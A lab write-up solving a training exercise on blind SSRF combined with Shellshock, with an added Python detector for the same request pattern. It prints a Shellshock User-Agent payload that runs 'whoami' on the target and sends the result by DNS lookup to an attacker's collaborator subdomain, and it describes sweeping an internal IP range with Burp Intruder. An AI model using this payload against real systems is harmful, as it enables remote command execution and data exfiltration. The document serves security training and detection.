Blind SSRF with Shell Shock Exploitation

Introduction

In this article, we are going to solve the Blind SSRF with Shell Shock Exploitation lab. This is the 7th lab, and the 6th article, in our series on server-side request forgery.

Lab Description

This lab contains analytics software that fetches the URL specified in the Referer header whenever a product page is loaded. To reach the internal server, we need to perform a blind SSRF attack; the lab also gives us the internal IP range and port. We then need to execute a Shellshock payload against the internal server to fetch the OS user’s name.

Lab Solution

I have already shown in a previous lab how to automate the Burp Collaborator payload in the Referer header. You can read that article for the details.

As you can see, I visited the lab and intercepted a product page request. After intercepting it, I added my new payload in the Referer header.

After adding the payload, I confirmed that the application is vulnerable to SSRF, because I received DNS and HTTP interactions in Collaborator.

Next, we need a Shellshock payload to place in the User-Agent header.

You can copy the basic trigger from any reference; I am providing it here:

() { :; };

Now replace the existing User-Agent value with the full payload:

() { :; }; /usr/bin/nslookup $(whoami).BURP-COLLABORATOR-SUBDOMAIN

Or

() { :; }; /usr/bin/nslookup `whoami`.BURP-COLLABORATOR-SUBDOMAIN

Replace the Referer value with the internal IP address, so that the analytics software fetches the internal server instead. After doing this, send the request to Burp Intruder.

In Intruder, mark the unknown octet of the internal IP (the “x” in the range the lab gives you) as the payload position and set the payload type to Numbers. Configure the attack to run from 0 to 255 with a step of 1.

After clicking Start attack, you will receive DNS and HTTP interactions in Collaborator, and one of them will carry the name of the OS user in its subdomain.
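From the defender's side, the request shape this lab depends on, a Shellshock function definition in a header value combined with a Referer pointing at an internal address, is easy to flag in access logs or a WAF. The following Python is an added example, not part of the original writeup or the lab; the sample requests and the 192.168.0.1 address are constructed placeholders.

```python
import ipaddress
import re
from urllib.parse import urlparse

# A Shellshock trigger is a header value that starts with bash's exported
# function syntax, "() {", which a vulnerable bash parses before running the
# CGI handler. Matching that prefix catches the lab payload and its variants.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def referer_targets_internal(referer: str) -> bool:
    """True if the Referer URL points at loopback or a private (RFC 1918) IP."""
    host = urlparse(referer).hostname
    if not host:
        return False
    if host == "localhost":
        return True
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        # A hostname, not a literal IP: resolving it is out of scope offline.
        return False


def flag_request(headers: dict) -> list:
    """Return the reasons a request matches the blind-SSRF + Shellshock pattern."""
    lowered = {name.lower(): value for name, value in headers.items()}
    findings = []
    for name, value in lowered.items():
        if SHELLSHOCK_RE.search(value):
            findings.append(f"shellshock signature in {name}")
    referer = lowered.get("referer", "")
    if referer and referer_targets_internal(referer):
        findings.append("referer targets internal address")
    return findings


# Constructed sample requests (not captured from the lab); the 192.168.0.1
# address is a placeholder for the internal host the lab asks you to find.
BENIGN = {"Referer": "https://example.com/catalog", "User-Agent": "Mozilla/5.0"}
SUSPICIOUS = {
    "Referer": "http://192.168.0.1/",
    "User-Agent": "() { :; }; /usr/bin/nslookup $(whoami).BURP-COLLABORATOR-SUBDOMAIN",
}

if __name__ == "__main__":
    for label, request in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, flag_request(request) or ["no findings"])
```

The check only inspects literal IP addresses in the Referer; a hostname that resolves to an internal address would need DNS resolution at the point of inspection.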

Now you can submit the name of the OS user in the lab called Blind SSRF with Shell Shock Exploitation.
